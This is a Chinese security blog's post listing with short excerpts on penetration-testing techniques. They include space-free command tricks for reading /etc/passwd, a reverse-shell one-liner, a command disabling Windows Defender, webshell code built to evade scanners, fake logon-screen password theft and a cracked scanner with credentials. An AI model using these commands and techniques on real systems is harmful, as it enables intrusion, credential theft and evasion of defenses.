- 博客(15)
- 资源 (31)
- 收藏
- 关注
原创 bashtricks :无空格命令执行
在一些漏洞利用场景,或者因为waf等原因,导致无法使用空格时,可以试试如下命令:IFS=,;`cat<<<cat,/etc/passwd` cat$IFS/etc/passwd cat${IFS}/etc/passwd cat</etc/passwd {cat,/etc/passwd...
2020-03-22 10:43:40 345
原创 BigIP Cookie 解码获取真实IP
BIGip是对负载均衡的实现,主要通过Virtual Server、iRules、Pool、Node、Monitor和Persistent(会话保持)实现。BIGip在实现会话保持机制时会在用户首次发起请求时,会为用户设置一个cookie,即服务端会添加set-cookie响应头头(比如:Set-Cookie: BI...
2020-03-21 19:43:17 2467
原创 SMBGhost 蓝屏代码(测试成功)
CVE-2020-0796 蓝屏的代码。twitter上发现的。本地虚拟机,Windows10专业版1903测试成功.使用方法:安装impacket库git clone https://github.com/SecureAuthCorp/impacket.gitcd impacketpython setu...
2020-03-18 09:22:04 904
原创 AWVS 13 Docker版本(破解后)
docker pull vouu/acunetix运行docker run -it -d -p 443:3443 vouu/acunetix登陆信息地址:https://localhost邮箱:contact@manhtuong.net密码 :Abcd1234来源: https://hub.docke...
2020-03-17 11:08:06 4207 1
原创 分享个学习shell脚本或辅助理解的网站-explainshell.com
有的时候我们会遇到一些特别难理解的shell命令,或者是一些参数我们不知道它的作用。那么今天分享的这个网址可以帮助解决上面的烦恼。网站主页打开后就是一个输入框。输入命令后,就会给出解析的结果。结果包含了解析的结果,并在下面给出了详细的说明。很方便。例如我们以bash -i >& /dev/tcp/10...
2020-03-05 14:38:34 202
原创 伪造windows登录屏幕窃取密码之FakeLogonScreen
在windows环境中,获取系统密码,提升系统权限。在渗透测试是经常遇到的。今天这里介绍一款伪造windows登录屏幕以达到窃取密码或题全的软件——FakeLogonScreen。简介FakeLogonScreen这个程序是用于伪造windows登录凭证以获取系统登录密码。它会获取当前系统配置的背景图片,这样显得...
2020-03-03 21:41:08 220
原创 Windows Server 2016抓取明文密码
临时禁止Windows DefenderREG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /fgpupdate /for...
2020-03-02 22:34:17 940
原创 Golang实现的x86下的Meterpreter reverse tcp
Golang实现的x86下的Meterpreter reverse tcp。地址:https://github.com/insightglacier/go_meterpreter做静态免杀实验,代码修改自EGESPLOIT 这个开源项目。单独实现主要在于减小程序编译后体积。目前编译后的大小在1.2M左右。使用方法...
2020-02-23 07:50:33 185
原创 Apache Shiro 反序列化漏洞利用工具使用
Shiro_exploit用于检测与利用Apache Shiro反序列化漏洞脚本。可以帮助企业发现自身安全漏洞。工具下载地址:Shiro_Exploit该脚本通过网络收集到的22个key,利用ysoserial工具中的URLDNS这个Gadget,并结合dnslog平台实现漏洞检测。漏洞利用则可以选择Gadget...
2020-02-15 20:13:32 9431
原创 CVE-2019-8449 Jira 枚举用户漏洞的利用
一个很攻击门槛很低的漏洞。可结合其它漏洞配合来进行攻击。首先来简单说一下这个漏洞,该漏洞就是在Jira 8.4.0以前的版本,攻击者可以在不经过授权的情况下访问/rest/api/latest/groupuserpicker这个路径来枚举用户。漏洞危害评级中危。2020年2月3日在exploit-db上公布了该漏...
2020-02-13 14:23:26 733
原创 IMAP 爆破脚本
IMAP(Internet Mail Access Protocol)以前称作交互邮件访问协议(Interactive Mail Access Protocol),是一个应用层协议。IMAP是斯坦福大学在1986年开发的一种邮件获取协议。它的主要作用是邮件客户端可以通过这种协议从邮件服务器上获取邮件的信息,下载邮件等...
2020-01-02 17:53:24 1145
原创 青藤云Webshell查杀绕过
上周看到一些朋友在发青藤云的聊天记录,绕过一个发200块红包。周末的时候就简单做了个测试。首先使用绕过D盾的webshell,发现被标记为恶意。这就有点意思了。我去看了一下聊天记录的内容,看原理是采用的深度学习的方式。猜测是有监督的方式来实现的(仅为猜测)。我这里绕过的思路采用的是,使用开源程序进行修改,带入一句话...
2019-12-30 06:28:08 1384
原创 最新绕过D盾的php Webshell
去年分析D盾的查杀规律弄的绕过。查杀效果:具体请看代码:<?phpfunction cc(){ global $b; $a =$_GET[$b]; //此处可改成POST方式 $str =$a; return $str;}?><?php$b=...
2019-12-28 10:16:54 464
原创 Python2与Python3差异之print
时代在发展,技术在进步。没有什么是停止不前的!2019年已经接近尾声,Python2停止更新的时间越来越近。其中比较流行的如 NumPy、Requests 和 TensorFlow 等承诺到 2020 年将停止支持2.x。尽管迁移过程也会花许多时间与精力,但是转Python3是早晚都要面对的。最近在迁移自己的代码到P...
2019-12-26 22:21:16 128
原创 Apache Shiro 反序列化漏洞实战
Apache Shiro是一个Java安全框架,执行身份验证、授权、密码和会话管理。2016年,网络中曝光1.2.4以前的版本存在反序列化漏洞。尽管该漏洞已经曝光几年,但是在实战中仍然比较实用。花了点时间研究了下,并根据网络上的利用脚本改进。主要修改了检测方式,并使利用方式更加简单灵活,使其更具有实战意义,提升其效率...
2019-12-17 07:17:16 1293
基于Google.App.Engine(GAE)的Java和GWT应用开发
2011-03-25
IT学生解惑手册,对在校学生很有帮助
2010-06-11
VB模仿的windows7桌面效果
2010-02-12
最全的网页设计教程(包含xml,ajax,html,css,asp,php,javascript等)
2010-02-09
空空如也
TA创建的收藏夹 TA关注的收藏夹
TA关注的人